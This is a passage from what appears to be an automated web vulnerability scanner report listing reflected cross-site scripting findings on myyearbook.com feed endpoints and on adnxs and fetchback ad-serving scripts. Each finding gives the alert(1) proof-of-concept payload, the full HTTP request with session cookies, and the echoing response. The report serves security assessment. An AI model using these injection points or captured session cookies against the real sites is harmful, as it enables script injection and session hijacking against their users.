GET /feed/myMagFeedItems83ac5<img%20src%3da%20onerror%3dalert(1)>8ffe07b1407?callback=jsonp1300624487161 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:06:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:21:10 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: 290e2c8e3c7153163eeddd5bc3aabb08
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.192
Content-Length: 125

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: myMagFeedItems83ac5<img src=a onerror=alert(1)>8ffe07b1407"});

1.92. http://home.myyearbook.com/feed/ownedFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/ownedFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4da94<img%20src%3da%20onerror%3dalert(1)>0e1346e2992 was submitted in the REST URL parameter 2. This input was echoed as 4da94<img src=a onerror=alert(1)>0e1346e2992 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/ownedFeedItems4da94<img%20src%3da%20onerror%3dalert(1)>0e1346e2992?callback=jsonp1300624487169 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:08:12 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:23:12 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: a4e99a4e57393a00a7b9e16f48f55234
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.193
Content-Length: 125

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: ownedFeedItems4da94<img src=a onerror=alert(1)>0e1346e2992"});

1.93. http://home.myyearbook.com/feed/profileFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/profileFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf835<img%20src%3da%20onerror%3dalert(1)>5ad0cb131a3 was submitted in the REST URL parameter 2. This input was echoed as bf835<img src=a onerror=alert(1)>5ad0cb131a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/profileFeedItemsbf835<img%20src%3da%20onerror%3dalert(1)>5ad0cb131a3?callback=jsonp1300624487162 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:06:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:21:10 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: 77b266fb3294f04ae1d1b6d469c92f8b
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.194
Content-Length: 127

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: profileFeedItemsbf835<img src=a onerror=alert(1)>5ad0cb131a3"});

1.94. http://home.myyearbook.com/feed/quizFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/quizFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d3aff<img%20src%3da%20onerror%3dalert(1)>e561f174639 was submitted in the REST URL parameter 2. This input was echoed as d3aff<img src=a onerror=alert(1)>e561f174639 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/quizFeedItemsd3aff<img%20src%3da%20onerror%3dalert(1)>e561f174639?callback=jsonp1300624487163 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:06:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:21:11 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: ca1db457b0384794d2a7471ed6b4a799
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.192
Content-Length: 124

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: quizFeedItemsd3aff<img src=a onerror=alert(1)>e561f174639"});

1.95. http://home.myyearbook.com/feed/stickersFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/stickersFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3faad<img%20src%3da%20onerror%3dalert(1)>bf982b19f38 was submitted in the REST URL parameter 2. This input was echoed as 3faad<img src=a onerror=alert(1)>bf982b19f38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/stickersFeedItems3faad<img%20src%3da%20onerror%3dalert(1)>bf982b19f38?callback=jsonp1300624487168 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:08:12 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:23:12 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: a5da5782c6a0fdad2a834d9ea0a61c46
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.193
Content-Length: 128

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: stickersFeedItems3faad<img src=a onerror=alert(1)>bf982b19f38"});

1.96. http://home.myyearbook.com/feed/tvFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/tvFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 15bd8<img%20src%3da%20onerror%3dalert(1)>6e4de7dccb5 was submitted in the REST URL parameter 2. This input was echoed as 15bd8<img src=a onerror=alert(1)>6e4de7dccb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/tvFeedItems15bd8<img%20src%3da%20onerror%3dalert(1)>6e4de7dccb5?callback=jsonp1300624487159 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 12:57:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:12:10 GMT
Last-Modified: Sun, 20 Mar 2011 12:55:05 GMT
Etag: 3fbb8a3958b6b973282247e5f5c1e4e4
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.194
Content-Length: 122

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: tvFeedItems15bd8<img src=a onerror=alert(1)>6e4de7dccb5"});

1.97. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29ae'%3balert(1)//d29b7f918c0 was submitted in the redir parameter. This input was echoed as e29ae';alert(1)//d29b7f918c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ptj?member=311&inv_code=cm.mtv&size=728x90&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.mtv%2Fgames_010111%3Bnet%3Dcm%3Bu%3D%2Ccm-57639981_1300624460%2C11e4f07c0988ac7%2Cmusic%2Cax.{PRICEBUCKET}-am.bk-cm.sportsreg-cm.sports_m-cm.ent_m-qc.ac-ex.6-bz.30-bz.51-bz.25-bz.ab-bz.ae-wfm.difi_h-iblocal.sports_h%3B%3Bcmw%3Dnurl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D595575%3Bcontx%3Dmusic%3Ban%3D{PRICEBUCKET}%3Bdc%3Dd%3Bbtg%3Dam.bk%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_m%3Bbtg%3Dcm.ent_m%3Bbtg%3Dqc.ac%3Bbtg%3Dex.6%3Bbtg%3Dbz.30%3Bbtg%3Dbz.51%3Bbtg%3Dbz.25%3Bbtg%3Dbz.ab%3Bbtg%3Dbz.ae%3Bbtg%3Dwfm.difi_h%3Bbtg%3Diblocal.sports_h%3Bord%3D%5Btimestamp%5D%3Fe29ae'%3balert(1)//d29b7f918c0 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIItpsBEAoYASABKAEw3ufQ6wQQ3ufQ6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfw)m=m<8a)J7/OYqA#I@e#eDE9=Py:WS'3:BpJ.3fNiVPfcBe9rn1aB/6H+D$XQ0gx^1'AYU`UR#oFwfHf%DH8<[[cjKwVBm*M(iqWjevsQZEt2q0oL5%0EmxK8z2_PCO6pHErdvz5r0KUET%2<YsAO_Z^s7PsD.>Bm?LyU?iq#_wUDqCS^'gH:aWk1QkZr6:NkA2]h$E7O+bJO6RMsO?dwCP@fx7k2x+rZE:PcvYUUGK<b$=!46J5RBmG!KCMY3qw<0ZsO.7m1@@J]dT?uqgHUeujm#J[F3Ic)xI:0h.IrKwLp@!nRoTs9TR.KV0HC-[aN-S.NM-..^QiGWP:tHK@c>eYPr`^5Ez$b+OpujL=?PpFw%0J9dl#KGP_e=!l<xtx<iM2697EY!itEF@@(y(ew>uw@1C]7=d?aFBLGcu`?E^7SP%Pq^pjR[>f'usl[sr#mFs%A#Lz4QOW2zZJM5$Xa2uAI<vpl^wyj]osr1=p(^NeLkR>kk*LRe'P4Y8XBZmVMx(bWFBNIBvZETU#!TWNP0xe^?..iZm#rpSqZ/9B<]t%dHA:JoO9O^4*(3[<uLv.R>7qZoqCw#Ng`=CV?vZuNc^A.l71pRb`8uQE!LK7!*Sb!Z-fE_Q(-A`z#bqz'6L)GTEX1YmmjQR+Jf!Mdu<9X_F5%v[KR(M^QzXCCpr%kkr]%b$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 21-Mar-2011 12:46:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sat, 18-Jun-2011 12:46:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIs34QChgBIAEoATC_7pfsBBC_7pfsBBgA; path=/; expires=Sat, 18-Jun-2011 12:46:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb384368=5_[r^kI/7Z)IsM>7=/CbLm[7l?enc=Oy6qRUQx6D-cKRml8MXlPwAAAAAAAAhAnCkZpfDF5T88LqpFRDHoP-szXC5CLBYYvNv2i6g_Cj4_94VNAAAAAPA7AwA3AQAAZAAAAAIAAAA4UAIAy10AAAEAAABVU0QAVVNEANgCWgCfGAAArAsBAgUCAAUAAAAAhR9LIwAAAAA.&tt_code=cm.mtv&udj=uf%28%27a%27%2C+27%2C+1300625215%29%3Buf%28%27g%27%2C+1079%2C+1300625215%29%3Buf%28%27r%27%2C+151608%2C+1300625215%29%3Bppv%2882%2C+%271735623369155163115%27%2C+1300625215%2C+1310993215%2C+17328%2C+24011%29%3Bppv%2884%2C+%271735623369155163115%27%2C+1300625215%2C+1310993215%2C+17328%2C+24011%29%3Bppv%2811%2C+%271735623369155163115%27%2C+1300625215%2C+1310993215%2C+17328%2C+24011%29%3Bppv%2882%2C+%271735623369155163115%27%2C+1300625215%2C+1310993215%2C+17328%2C+24011%29%3Bppv%2884%2C+%271735623369155163115%27%2C+1300625215%2C+1310993215%2C+17328%2C+24011%29%3Bppv%2887%2C+%271735623369155163115%27%2C+1300625215%2C+1300711615%2C+17328%2C+24011%29%3Bppv%28619%2C+%271735623369155163115%27%2C+1300625215%2C+1300711615%2C+17328%2C+24011%29%3Bppv%28620%2C+%271735623369155163115%27%2C+1300625215%2C+1300711615%2C+17328%2C+24011%29%3Bppv%28621%2C+%271735623369155163115%27%2C+1300625215%2C+1300711615%2C+17328%2C+24011%29%3B&cnd=!1hb-_giwhwEQuKAJGAAgy7sBKAAxmREkvUMx6D9CEwgAEAAYACABKP7__________wFCCghSEAAYACADKABCCghUEAAYACADKABIAVAAWJ8xYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; path=/; expires=Mon, 21-Mar-2011 12:46:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sat, 18-Jun-2011 12:46:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)m=m<8a)J7/OYq<NkAD#^[ScYwr*/_m`)N7CJezt69.Wq*y:[dS+Zf[]I'eZY55'v>3EmFl:42bEk1a^R7`$v9P#$pi*A4(K$t_pHFwa*v+w9DApc(0-)J8)tlQhP[0-WNnkp6s/NSG)iDObE#527Z`0ul?8b.>BmCLyTeXpunJ=YKgA@c+aSb3Sv[aJnbO68AL=6F*L[+s>/@ncHoS@F<M/Ct=Q$rthQLpgws#zpIJNzGf2c=EuIA5p4B/ZVY+<6k:K_9Hj3B!^B[I[m?FlECBuS+-Q1LlslWQwW/vPR'yJt%9k?HF#:UXp.sz_I3y=>3cD1veoM9VbgRt#UcWlH7tQSJ)<q^:<Bg7pEXAIj=_+>#bit(H2qh$Xc9q1CdA.<dm^tL]2O[UA%>Som2?wF6S+_8)<5=zq>HrkUpr^pA(oxC^-r`XZFV@CO$e6->42savlAY3lnMl'i7I$rb]_vu_hv-M>Ru=L[qw!%KkvvypHc'^.wk*wM)m3c!cena0%dukN]bT<p8RX6N#Z>QgY'*ojUBfQm0mY>ICcHxr/qCDjX9`c[OTQj=FAmJFOBK9T)=5(s=H4F%@_f[3@ZjYA(nw1pAd*Y/'w-Ch4EMsHPW0?yBka)(QB`zNAJ-XVF_'K!kv?2JYrj)pab+OKSvj)46KU4Dl[[+y)!a*W^; path=/; expires=Sat, 18-Jun-2011 12:46:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sun, 20 Mar 2011 12:46:55 GMT
Content-Length: 783

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.mtv/games_010111;net=cm;u=,cm-57639981_1300624460,11e4f07c0988ac7,music,ax.60-am.bk-cm.sportsreg-cm.sports_m-cm.e
...[SNIP]...
;contx=music;an=60;dc=d;btg=am.bk;btg=cm.sportsreg;btg=cm.sports_m;btg=cm.ent_m;btg=qc.ac;btg=ex.6;btg=bz.30;btg=bz.51;btg=bz.25;btg=bz.ab;btg=bz.ae;btg=wfm.difi_h;btg=iblocal.sports_h;ord=[timestamp]?e29ae';alert(1)//d29b7f918c0">
...[SNIP]...

1.98. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79339"-alert(1)-"3a791a9b171 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=6436&type=lead&clicktrack=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bde8e87e7c08dcb01%253B12ed3430f73%2C0%253B%253B%253B3505910700%2CcLl%2DABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeHQAAAAAAtXkMAAAAAAAACA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcw9D0y4BAAAAAAAAADdlMjQ0MmYyLTUyZWUtMTFlMC1iMzMwLTAwMzA0OGQ1NmFhNAA4nyoAAAA%3D%2C%2Chttp%253A%252F%252Ftherugged%2Ecom%252F%2C79339"-alert(1)-"3a791a9b171 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?cLl-ABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeHQAAAAAAtXkMAAAAAAAACA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAEjY8vVKW5z8NAiuHFtnwP7-fGi.dJPI.7FG4HoXr-T8.CtejcD3-P5qZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvvAOl.djOCUuT1BsThjs22HOeFbFpkZ8FEdeFAAAAAA==,,http%3A%2F%2Ftherugged.com%2F,Z%3D728x90%26s%3D1602587%26_salt%3D4236502337%26B%3D10%26u%3Dhttp%253A%252F%252Ftherugged.com%252F%26r%3D0,7e2442f2-52ee-11e0-b330-003048d56aa4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; cre=1_1300549516_20053:11792:7:0_20056:11790:2:1003244_14598:11789:1:1180912; uid=1_1300549516_1297862321306:0415785655118336; kwd=1_1300549516_11317:138330_11717:138330_11718:138330_11719:138330_11722:246965_10827:246965_10842:246969_10839:246969_10824:247169; scg=1_1300549516; ppd=1_1300549516

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:01:43 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300626103_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Fri, 18-Mar-2016 13:01:43 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 20 Mar 2011 13:01:43 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 649

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=6436&type=lead&clicktrack=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bde8e87e7c08dcb01%253B12ed3430f73%2C0%253B%25
...[SNIP]...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcw9D0y4BAAAAAAAAADdlMjQ0MmYyLTUyZWUtMTFlMC1iMzMwLTAwMzA0OGQ1NmFhNAA4nyoAAAA%3D%2C%2Chttp%253A%252F%252Ftherugged%2Ecom%252F%2C79339"-alert(1)-"3a791a9b171' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

1.99. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcb9e"-alert(1)-"9d8e5c695bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=6436&type=lead&clicktrack=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bde8e87e7c08dcb01%253B12ed3430f73%2C0%253B%253B%253B3505910700%2CcLl%2DABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeHQAAAAAAtXkMAAAAAAAACA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcw9D0y4BAAAAAAAAADdlMjQ0MmYyLTUyZWUtMTFlMC1iMzMwLTAwMzA0OGQ1NmFhNAA4nyoAAAA%3D%2C%2Chttp%253A%252F%252Ftherugged%2Ecom%252F%2C&dcb9e"-alert(1)-"9d8e5c695bf=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?cLl-ABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeHQAAAAAAtXkMAAAAAAAACA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAEjY8vVKW5z8NAiuHFtnwP7-fGi.dJPI.7FG4HoXr-T8.CtejcD3-P5qZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvvAOl.djOCUuT1BsThjs22HOeFbFpkZ8FEdeFAAAAAA==,,http%3A%2F%2Ftherugged.com%2F,Z%3D728x90%26s%3D1602587%26_salt%3D4236502337%26B%3D10%26u%3Dhttp%253A%252F%252Ftherugged.com%252F%26r%3D0,7e2442f2-52ee-11e0-b330-003048d56aa4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
